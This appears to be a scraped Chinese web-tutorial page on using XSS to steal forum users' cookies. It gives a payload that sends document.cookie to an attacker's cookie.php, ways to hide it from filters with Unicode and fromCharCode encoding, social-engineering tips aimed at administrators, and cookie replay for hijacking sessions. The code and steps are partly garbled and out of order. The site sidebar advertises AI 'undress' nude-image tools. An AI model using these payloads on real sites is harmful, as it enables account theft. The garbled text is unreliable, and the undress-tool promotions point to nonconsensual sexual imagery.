首頁 web前端 js教程 XSS攻擊Cookie欺騙中隱藏JavaScript執行

XSS攻擊Cookie欺騙中隱藏JavaScript執行

Nov 25, 2016 am 09:45 AM
javascript

例如發現一處可XSS地方:
<script>alert(不管怎麼樣彈出就好)</script>

自己弄個偷cookie的檔案。

目的是讓其他瀏覽者去瀏覽我們設計好的陷阱
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

怎麼弄其實也不用我多說了。 。

現在主要說的是如何隱藏JavaScript執行。

大家可能習慣每天去milw0rm.com看EXP,

每當發布XSS漏洞的EXP,當我們利用的時候。

卻無法cookie任何訊息,這是為什麼呢。 。

像魔力,PHPBB這樣大型的論壇都具備XSS漏洞。

我給的這個
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

會顯示Javascript 錯誤。

解決方法有2種,我們可以把外部敏感資訊用unicode編碼

給個URL:http://www.mikezilla.com/exp0012.html

透過編碼就是這樣:
<script>eval(location .href="http://www.php1.cn/"><br/>上述還不就用第2種方法<br/><br/>Javascript fromCharCode中的eval功能<br/><br/>上面說了可以用unicode編碼過一些站<br/><br/>比如編碼後的104,116,116,112就是HTTP<br/><br/>如果論壇用了其他的編輯器,例如PHPWind 用的所見所得編輯器<br/><br/>直接打上http://url.com一定會曝光。就看編輯器的形式來調換URL<br/><br/>比如偷COOKIE的站是http://www.URL.com<br/><br/>我們就這樣<br/>http://www.url.com<br/><br/>當然顯示的部分你可以替換成吸引人的資訊騙取管理和斑竹的點擊<br/><br/>用一點社會工程學就可以了。陷阱,並且點了他<br/><br/>第2步:Javascript 執行成功了。文本,將URL用Unicode編碼(這裡習慣說是加密)http://www.mikezilla.com/exp0012.html<br/><br/>第5步:截取的Cookie訊息當然不是明文的,我們只要使用FireFox Cookie 編輯器<br/>替換COOKIE就OK了,或者用CookieEditor等其他工具。 com","cookie monster",$_REQUEST[cookie]);<br/><br/>?><br/><html><br/><script>document.location=http://www.URL.com/'</script>

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
2 週前 By 尊渡假赌尊渡假赌尊渡假赌
倉庫:如何復興隊友
4 週前 By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
3 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

如何使用WebSocket和JavaScript實現線上語音辨識系統 如何使用WebSocket和JavaScript實現線上語音辨識系統 Dec 17, 2023 pm 02:54 PM

如何使用WebSocket和JavaScript實現線上語音辨識系統

WebSocket與JavaScript:實現即時監控系統的關鍵技術 WebSocket與JavaScript:實現即時監控系統的關鍵技術 Dec 17, 2023 pm 05:30 PM

WebSocket與JavaScript:實現即時監控系統的關鍵技術

如何使用WebSocket和JavaScript實現線上預約系統 如何使用WebSocket和JavaScript實現線上預約系統 Dec 17, 2023 am 09:39 AM

如何使用WebSocket和JavaScript實現線上預約系統

如何利用JavaScript和WebSocket實現即時線上點餐系統 如何利用JavaScript和WebSocket實現即時線上點餐系統 Dec 17, 2023 pm 12:09 PM

如何利用JavaScript和WebSocket實現即時線上點餐系統

簡易JavaScript教學:取得HTTP狀態碼的方法 簡易JavaScript教學:取得HTTP狀態碼的方法 Jan 05, 2024 pm 06:08 PM

簡易JavaScript教學:取得HTTP狀態碼的方法

JavaScript與WebSocket:打造高效率的即時天氣預報系統 JavaScript與WebSocket:打造高效率的即時天氣預報系統 Dec 17, 2023 pm 05:13 PM

JavaScript與WebSocket:打造高效率的即時天氣預報系統

如何在JavaScript中取得HTTP狀態碼的簡單方法 如何在JavaScript中取得HTTP狀態碼的簡單方法 Jan 05, 2024 pm 01:37 PM

如何在JavaScript中取得HTTP狀態碼的簡單方法

javascript如何使用insertBefore javascript如何使用insertBefore Nov 24, 2023 am 11:56 AM

javascript如何使用insertBefore

See all articles